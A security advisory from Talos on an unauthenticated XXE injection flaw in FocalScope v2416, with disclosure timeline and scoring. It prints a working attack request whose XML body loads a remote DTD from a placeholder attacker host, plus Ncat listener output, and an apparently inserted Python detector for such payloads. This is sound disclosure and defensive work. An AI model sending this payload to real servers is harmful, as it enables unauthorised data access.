Talos Vulnerability Report


FocalScope XML External Entity Injection Vulnerability

July 20, 2018
CVE Number



An exploitable unauthenticated XML external entity (XXE) injection vulnerability was identified in FocalScope v2416. An unauthenticated attacker could submit a specially crafted web request to FocalScope's server to trigger the XXE, potentially resulting in data compromise.

Tested Versions

FocalScope v2416

Product URLs


CVSSv3 Score

9.4 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H


CWE-611: Improper Restriction of XML External Entity Reference (‘XXE’)


FocalScope v2416 and prior versions are vulnerable to an unauthenticated XML External Entity injection attack. The following request, with an XML payload in the body, was used to trigger the XXE:

POST /emm/_cros_/xlogin.asp HTTP/1.1
Host: [IP]
Content-Length: 315
Origin: http://[IP]
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: text/xml; charset=UTF-8
Accept: */*
DNT: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close

	<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://x.x.x.x/xxe"> %remote;%int;%trick;]><body><o i='msg'><s i='_url'>url:xlogin.asp</s><s i='_fnc'>GetSalt</s><o i='oParam'><s i='sUser'>PCSL</s><s i='sMyName'>self</s><s i='sCallback'>PutSalt</s></o></o></body>

On the attacking server, the following request can be observed:
Ncat: Connection from x.x.x.x.
Ncat: Connection from x.x.x.x.
GET /xxe HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: x.x.x.x
Connection: Keep-Alive

Note: It was also observed that nearly any page that accepts XML input in a POST request is affected by this vulnerability, regardless of whether the page is protected by authentication.
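A detection check for the request pattern described above, as an added example that is not part of the original advisory or of FocalScope: it flags any POST whose XML body carries a DOCTYPE or entity declaration, on any path, since the note above says the issue is not limited to xlogin.asp. The function names, the `/any/page.asp` path and the sample hosts are assumptions made for illustration.

```python
import re

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.I)
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<param>%\s+)?(?P<name>[^\s>]+)\s+(?P<kind>SYSTEM|PUBLIC)?", re.I)

def decode_body(raw: bytes) -> str:
    """Decode by BOM so a UTF-16 body cannot slip past a byte-level match."""
    for bom, enc in ((b"\xff\xfe", "utf-16-le"), (b"\xfe\xff", "utf-16-be"),
                     (b"\xef\xbb\xbf", "utf-8")):
        if raw.startswith(bom):
            return raw[len(bom):].decode(enc, errors="replace")
    return raw.decode("utf-8", errors="replace")  # BOM-less UTF-16 is not handled here

def inspect_request(raw: bytes) -> dict:
    """Report DTD-related findings for one raw HTTP request (hypothetical helper)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    method, path = head.decode("latin-1").split("\r\n")[0].split(" ")[:2]
    text = decode_body(body)
    findings = set()
    # Path is deliberately ignored: any page that parses posted XML is in scope.
    if method == "POST" and text.lstrip().startswith("<"):
        if DOCTYPE_RE.search(text):
            findings.add("doctype")
        for m in ENTITY_RE.finditer(text):
            if m.group("kind"):       # SYSTEM/PUBLIC: parser fetches an outside resource
                findings.add("external-entity")
            if m.group("param"):      # '%' entities are what pull in a remote DTD
                findings.add("parameter-entity")
    return {"path": path, "findings": sorted(findings)}

# Constructed sample requests (not captured traffic); hosts are placeholders.
BENIGN = (b"POST /emm/_cros_/xlogin.asp HTTP/1.1\r\nHost: app.example\r\n"
          b"Content-Type: text/xml; charset=UTF-8\r\n\r\n"
          b"<body><o i='msg'><s i='_fnc'>GetSalt</s></o></body>")
WITH_DTD = (b"POST /any/page.asp HTTP/1.1\r\nHost: app.example\r\n"
            b"Content-Type: text/xml\r\n\r\n"
            b'<?xml version="1.0"?><!DOCTYPE root [<!ENTITY % remote SYSTEM '
            b'"http://collector.example/x"> %remote;]><body/>')
HEAD, _, BODY = WITH_DTD.partition(b"\r\n\r\n")
UTF16 = HEAD + b"\r\n\r\n" + b"\xff\xfe" + BODY.decode().encode("utf-16-le")

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("dtd", WITH_DTD), ("utf16", UTF16)):
        print(name, inspect_request(req))
```

A filter like this complements, and does not replace, disabling DTD and external-entity processing in the server's XML parser.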


2018-04-09 - Vendor Disclosure
2018-04-12 - Sent plain text file to vendor
2018-06-05 - 60 day follow up
2018-06-27 - Final follow up
2018-07-20 - Public Release


Discovered by Jerzy (Yuri) Kramarz of Security Advisory EMEAR